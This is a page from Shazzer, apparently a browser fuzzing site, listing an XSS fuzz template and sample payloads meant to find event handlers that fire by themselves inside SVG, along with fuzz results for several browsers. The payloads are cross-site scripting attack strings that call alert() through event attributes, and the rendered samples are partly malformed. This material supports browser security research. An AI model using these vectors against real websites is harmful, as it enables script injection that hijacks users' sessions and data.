Shazzer logo
Login

XSS vectors that execute automatically inside svg

Chrome logo 1
Firefox logo 1
Edge logo 1
Safari logo 1

This vector shows which events fire without user interaction inside a SVG tag

hackvertor
Created byhackvertor
Created Apr 17, 2024
Updated May 25, 2025

Tweet
Detecting browser...
CategoryURL Handling
VisibilityPublic
TypeXSS
CharsetUTF-8
$[data1] placeholderhtml
$[data2] placeholderevents
Template used:
<svg><$[data1] src=1 srcdoc=1 href=1 href=1 $[data2]="log('$[data1]->$[data2]')"></$[data1]></svg>0x0D
<svg><$[data1] $[data2]="log('$[data1]->$[data2]')"></$[data1]></svg>

Sample payloads

<svg><img->onerror src=1 srcdoc=1 href=1 href=1 ="alert('img->onerror->')"></img->onerror></svg>0x0D
<svg><img->onerror ="alert('img->onerror->')"></img->onerror></svg>

Fuzz results

Chrome logo
Chrome 145.0.0.0 desktop Windows NT 10.0
Updated17 Feb 2026
Found 1 result
Loading...
Chrome logo
Chrome 144.0.0.0 desktop macOS 10.15.7older version
Updated17 Feb 2026
Found 1 result
Loading...
Chrome logo
Chrome 124.0.0.0 Unknown Unknownolder version
Updated18 Apr 2024
Found 1 result
Loading...
Firefox logo
Firefox 148.0 desktop Windows NT 10.0
Updated23 Feb 2026
Found 1 result
Loading...
Edge logo
Microsoft Edge 145.0.0.0 desktop Windows NT 10.0
Updated18 Feb 2026
Found 1 result
Loading...
Safari logo
Safari 17.4.1 Unknown Unknown
Updated17 Apr 2024
Found 1 result
Loading...

Distributed Fuzzing

Enabled:
Status:disconnected
Your browser automatically contributes to distributed fuzzing when idle.